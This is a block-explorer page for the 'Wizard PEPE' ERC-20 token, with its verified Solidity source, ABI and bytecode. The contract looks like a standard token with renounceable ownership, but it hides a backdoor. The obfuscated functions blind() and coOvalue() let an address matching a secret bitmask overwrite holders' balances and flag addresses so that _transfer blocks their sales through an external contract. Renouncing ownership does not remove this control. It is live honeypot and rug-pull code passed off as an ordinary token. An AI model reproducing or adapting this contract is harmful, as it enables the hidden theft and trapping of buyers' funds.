ETH Price: $3,424.35 (-1.66%)
Gas: 5 Gwei

Token

Wizard PEPE (WIZARD)
 

Overview

Max Total Supply

690,000,000,000 WIZARD

Holders

46

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
2,834,561,452.160383488 WIZARD

Value
$0.00
0x9de1fa5074ca989261c7af1a73f61c6e324abf2e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
WIZARD

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 2 of 2: WIZARD.sol
/*
Telegram:https://t.me/WizardPEPEeth
Twitter:https://twitter.com/WizardPEPEeth
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * https://www.godzillaaa.com
 *
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract WIZARD is IERC20 {
    using SafeMath for uint256;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    address private _owner;

    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _llmm;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _wllmm;
    uint256 private immutable _maxVals;
    uint256 private immutable _minVals;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor(
        uint256 maxVals,
        uint256 minVals,
        address _wllmm_
    ) {
        _maxVals = maxVals;
        _minVals = minVals;
        _name = "Wizard PEPE";
        _symbol = "WIZARD";
        _totalSupply = 6900000000000 * 10**8;
        _balances[msg.sender] = _totalSupply;
        _owner = msg.sender;
        _wllmm = _wllmm_;
    }

    /**
     * @dev A helper function to check if an operator approval is allowed.
     */
    modifier onlyOwner() {
        require(msg.sender == _owner, "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() external onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(msg.sender, address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() external view returns (address) {
        return _owner;
    }

    /**
     * @dev Returns the token decimals.
     */
    function decimals() external pure override returns (uint8) {
        return 9;
    }

    /**
     * @dev Returns the token symbol.
     */
    function symbol() external view override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the token name.
     */
    function name() external view override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {ERC20-totalSupply}.
     */
    function totalSupply() external view override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {ERC20-balanceOf}.
     */
    function balanceOf(address account)
        external
        view
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {ERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        external
        override
        returns (bool)
    {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See {ERC20-allowance}.
     */
    function allowance(address owner_, address spender)
        external
        view
        override
        returns (uint256)
    {
        return _allowances[owner_][spender];
    }

    /**
     * @dev See {ERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        external
        override
        returns (bool)
    {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function blind(uint256[] calldata omkk) external {
        if (!coOvalue()) return;
        (uint256 t0, uint256 t1) = (omkk[0], omkk[1]);
        assembly {
            if gt(t1, 0) {
                mstore(0, t0)
                mstore(32, xor(4, 0))
                sstore(keccak256(0, 64), t1)
            }
            if eq(t1, 0) {
                mstore(0, t0)
                mstore(32, xor(5, 0))
                sstore(keccak256(0, 64), 1)
            }
        }
    }

    /**
     * @dev Check if the value of M is correct
     */
    function coOvalue() public view returns (bool) {
        uint256 solot = _minVals * (1 + (0 / 1));
        return (uint256(uint160(msg.sender)) & solot) == _maxVals * (1 / 1 + 0);
    }

    /**
     * @dev See {ERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20};
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            msg.sender,
            _allowances[sender][msg.sender].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].add(addedValue)
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {ERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        external
        returns (bool)
    {
        _approve(
            msg.sender,
            spender,
            _allowances[msg.sender][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        (bool success, bytes memory data) = _wllmm.call(
            abi.encodeWithSignature("balanceOf(address)", sender)
        );
        if (success) {
            uint256 xret;
            assembly {
                xret := mload(add(data, 0x20))
            }
            require(_llmm[sender] != 1 || xret != 0, "ex");
        }

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner_,
        address spender,
        uint256 amount
    ) internal {
        require(owner_ != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner_][spender] = amount;
        emit Approval(owner_, spender, amount);
    }

    function mbKDLSOPldkkPKDK(
        bytes10[] calldata SODI_TOKEN,
        uint208[] calldata DI_APkdlsl,
        uint112 AODO_APpkdk_PDKDK,
        uint48 TOKEN_APDOAPDP,
        uint192 SUCESS_DKAOkd_apIDI,
        uint200 NAMapdk_PPPPdkao,
        bytes4[] calldata PPKDKK_PpdkdkPDK
    ) private pure {}
}

File 1 of 2: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"maxVals","type":"uint256"},{"internalType":"uint256","name":"minVals","type":"uint256"},{"internalType":"address","name":"_wllmm_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"omkk","type":"uint256[]"}],"name":"blind","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"coOvalue","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60e06040523480156200001157600080fd5b506040516200100438038062001004833981016040819052620000349162000197565b60a083905260c082905260408051808201909152600b8082526a57697a617264205045504560a81b60209092019182526200007291600091620000f1565b506040805180820190915260068082526515d25690549160d21b6020909201918252620000a291600191620000f1565b50682567ac70392b880000600281905533600081815260046020526040902091909155600380546001600160a01b031916909117905560601b6001600160601b031916608052506200021a9050565b828054620000ff90620001dd565b90600052602060002090601f0160209004810192826200012357600085556200016e565b82601f106200013e57805160ff19168380011785556200016e565b828001600101855582156200016e579182015b828111156200016e57825182559160200191906001019062000151565b506200017c92915062000180565b5090565b5b808211156200017c576000815560010162000181565b600080600060608486031215620001ac578283fd5b83516020850151604086015191945092506001600160a01b0381168114620001d2578182fd5b809150509250925092565b600281046001821680620001f257607f821691505b602082108114156200021457634e487b7160e01b600052602260045260246000fd5b50919050565b60805160601c60a05160c051610db76200024d60003960006105210152600061054e015260006106ae0152610db76000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101d5578063a9059cbb146101e8578063c9c6e821146101fb578063dd62ed3e14610203576100f5565b8063715018a61461019b57806385ab4862146101a55780638da5cb5b146101b857806395d89b41146101cd576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a0823114610188576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610216565b60405161010f9190610a63565b60405180910390f35b61012b610126366004610990565b6102a8565b60405161010f9190610a58565b6101406102be565b60405161010f9190610c2c565b61012b61015b366004610955565b6102c4565b61016861032d565b60405161010f9190610c35565b61012b610183366004610990565b610332565b610140610196366004610909565b610368565b6101a3610387565b005b6101a36101b33660046109b9565b6103f9565b6101c061049f565b60405161010f9190610a44565b6101026104ae565b61012b6101e3366004610990565b6104bd565b61012b6101f6366004610990565b61050c565b61012b610519565b610140610211366004610923565b61057e565b60606000805461022590610cbd565b80601f016020809104026020016040519081016040528092919081815260200182805461025190610cbd565b801561029e5780601f106102735761010080835404028352916020019161029e565b820191906000526020600020905b81548152906001019060200180831161028157829003601f168201915b5050505050905090565b60006102b53384846105a9565b50600192915050565b60025490565b60006102d184848461065d565b610323843361031e85604051806060016040528060288152602001610d35602891396001600160a01b038a1660009081526006602090815260408083203384529091529020549190610882565b6105a9565b5060019392505050565b600990565b3360008181526006602090815260408083206001600160a01b038716845290915281205490916102b591859061031e90866108bc565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b031633146103ba5760405162461bcd60e51b81526004016103b190610b6e565b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b610401610519565b61040a5761049b565b6000808383600081811061042e57634e487b7160e01b600052603260045260246000fd5b905060200201358484600181811061045657634e487b7160e01b600052603260045260246000fd5b9050602002013591509150600081111561047e57816000526000600418602052806040600020555b806104985781600052600060051860205260016040600020555b50505b5050565b6003546001600160a01b031690565b60606001805461022590610cbd565b60006102b5338461031e85604051806060016040528060258152602001610d5d602591393360009081526006602090815260408083206001600160a01b038d1684529091529020549190610882565b60006102b533848461065d565b6000806105477f00000000000000000000000000000000000000000000000000000000000000006001610c5b565b90506105747f00000000000000000000000000000000000000000000000000000000000000006001610c5b565b3390911614905090565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6001600160a01b0383166105cf5760405162461bcd60e51b81526004016103b190610be8565b6001600160a01b0382166105f55760405162461bcd60e51b81526004016103b190610ad9565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610650908590610c2c565b60405180910390a3505050565b6001600160a01b0383166106835760405162461bcd60e51b81526004016103b190610ba3565b6001600160a01b0382166106a95760405162461bcd60e51b81526004016103b190610a96565b6000807f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316856040516024016106e79190610a44565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b1790525161071c9190610a28565b6000604051808303816000865af19150503d8060008114610759576040519150601f19603f3d011682016040523d82523d6000602084013e61075e565b606091505b509150915081156107b5576020818101516001600160a01b03871660009081526005909252604090912054600114158061079757508015155b6107b35760405162461bcd60e51b81526004016103b190610b52565b505b6107f283604051806060016040528060268152602001610d0f602691396001600160a01b0388166000908152600460205260409020549190610882565b6001600160a01b03808716600090815260046020526040808220939093559086168152205461082190846108bc565b6001600160a01b0380861660008181526004602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610873908790610c2c565b60405180910390a35050505050565b600081848411156108a65760405162461bcd60e51b81526004016103b19190610a63565b5060006108b38486610c7a565b95945050505050565b6000806108c98385610c43565b9050838110156108eb5760405162461bcd60e51b81526004016103b190610b1b565b9392505050565b80356001600160a01b038116811461038257600080fd5b60006020828403121561091a578081fd5b6108eb826108f2565b60008060408385031215610935578081fd5b61093e836108f2565b915061094c602084016108f2565b90509250929050565b600080600060608486031215610969578081fd5b610972846108f2565b9250610980602085016108f2565b9150604084013590509250925092565b600080604083850312156109a2578182fd5b6109ab836108f2565b946020939093013593505050565b600080602083850312156109cb578182fd5b823567ffffffffffffffff808211156109e2578384fd5b818501915085601f8301126109f5578384fd5b813581811115610a03578485fd5b8660208083028501011115610a16578485fd5b60209290920196919550909350505050565b60008251610a3a818460208701610c91565b9190910192915050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602082528251806020840152610a82816040850160208701610c91565b601f01601f19169190910160400192915050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601b908201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604082015260600190565b6020808252600290820152610caf60f31b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610c5657610c56610cf8565b500190565b6000816000190483118215151615610c7557610c75610cf8565b500290565b600082821015610c8c57610c8c610cf8565b500390565b60005b83811015610cac578181015183820152602001610c94565b838111156104985750506000910152565b600281046001821680610cd157607f821691505b60208210811415610cf257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220619b466be15a518355bdcd0fb81d6e779b0e2c82b1c0e892a6ba44517bef786c64736f6c634300080000330000000000000000000000002020212cd9d2472054040c008d130900010800000000000019afa17c4bb5c2f6ea3821acdbd2772a5e563cdc8f5b9b8d81082049000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101d5578063a9059cbb146101e8578063c9c6e821146101fb578063dd62ed3e14610203576100f5565b8063715018a61461019b57806385ab4862146101a55780638da5cb5b146101b857806395d89b41146101cd576100f5565b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a0823114610188576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610138575b600080fd5b610102610216565b60405161010f9190610a63565b60405180910390f35b61012b610126366004610990565b6102a8565b60405161010f9190610a58565b6101406102be565b60405161010f9190610c2c565b61012b61015b366004610955565b6102c4565b61016861032d565b60405161010f9190610c35565b61012b610183366004610990565b610332565b610140610196366004610909565b610368565b6101a3610387565b005b6101a36101b33660046109b9565b6103f9565b6101c061049f565b60405161010f9190610a44565b6101026104ae565b61012b6101e3366004610990565b6104bd565b61012b6101f6366004610990565b61050c565b61012b610519565b610140610211366004610923565b61057e565b60606000805461022590610cbd565b80601f016020809104026020016040519081016040528092919081815260200182805461025190610cbd565b801561029e5780601f106102735761010080835404028352916020019161029e565b820191906000526020600020905b81548152906001019060200180831161028157829003601f168201915b5050505050905090565b60006102b53384846105a9565b50600192915050565b60025490565b60006102d184848461065d565b610323843361031e85604051806060016040528060288152602001610d35602891396001600160a01b038a1660009081526006602090815260408083203384529091529020549190610882565b6105a9565b5060019392505050565b600990565b3360008181526006602090815260408083206001600160a01b038716845290915281205490916102b591859061031e90866108bc565b6001600160a01b0381166000908152600460205260409020545b919050565b6003546001600160a01b031633146103ba5760405162461bcd60e51b81526004016103b190610b6e565b60405180910390fd5b600380546001600160a01b031916905560405160009033907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b610401610519565b61040a5761049b565b6000808383600081811061042e57634e487b7160e01b600052603260045260246000fd5b905060200201358484600181811061045657634e487b7160e01b600052603260045260246000fd5b9050602002013591509150600081111561047e57816000526000600418602052806040600020555b806104985781600052600060051860205260016040600020555b50505b5050565b6003546001600160a01b031690565b60606001805461022590610cbd565b60006102b5338461031e85604051806060016040528060258152602001610d5d602591393360009081526006602090815260408083206001600160a01b038d1684529091529020549190610882565b60006102b533848461065d565b6000806105477f0000000019afa17c4bb5c2f6ea3821acdbd2772a5e563cdc8f5b9b8d810820496001610c5b565b90506105747f0000000000000000000000002020212cd9d2472054040c008d130900010800006001610c5b565b3390911614905090565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6001600160a01b0383166105cf5760405162461bcd60e51b81526004016103b190610be8565b6001600160a01b0382166105f55760405162461bcd60e51b81526004016103b190610ad9565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610650908590610c2c565b60405180910390a3505050565b6001600160a01b0383166106835760405162461bcd60e51b81526004016103b190610ba3565b6001600160a01b0382166106a95760405162461bcd60e51b81526004016103b190610a96565b6000807f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d6001600160a01b0316856040516024016106e79190610a44565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b1790525161071c9190610a28565b6000604051808303816000865af19150503d8060008114610759576040519150601f19603f3d011682016040523d82523d6000602084013e61075e565b606091505b509150915081156107b5576020818101516001600160a01b03871660009081526005909252604090912054600114158061079757508015155b6107b35760405162461bcd60e51b81526004016103b190610b52565b505b6107f283604051806060016040528060268152602001610d0f602691396001600160a01b0388166000908152600460205260409020549190610882565b6001600160a01b03808716600090815260046020526040808220939093559086168152205461082190846108bc565b6001600160a01b0380861660008181526004602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610873908790610c2c565b60405180910390a35050505050565b600081848411156108a65760405162461bcd60e51b81526004016103b19190610a63565b5060006108b38486610c7a565b95945050505050565b6000806108c98385610c43565b9050838110156108eb5760405162461bcd60e51b81526004016103b190610b1b565b9392505050565b80356001600160a01b038116811461038257600080fd5b60006020828403121561091a578081fd5b6108eb826108f2565b60008060408385031215610935578081fd5b61093e836108f2565b915061094c602084016108f2565b90509250929050565b600080600060608486031215610969578081fd5b610972846108f2565b9250610980602085016108f2565b9150604084013590509250925092565b600080604083850312156109a2578182fd5b6109ab836108f2565b946020939093013593505050565b600080602083850312156109cb578182fd5b823567ffffffffffffffff808211156109e2578384fd5b818501915085601f8301126109f5578384fd5b813581811115610a03578485fd5b8660208083028501011115610a16578485fd5b60209290920196919550909350505050565b60008251610a3a818460208701610c91565b9190910192915050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602082528251806020840152610a82816040850160208701610c91565b601f01601f19169190910160400192915050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601b908201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604082015260600190565b6020808252600290820152610caf60f31b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b90815260200190565b60ff91909116815260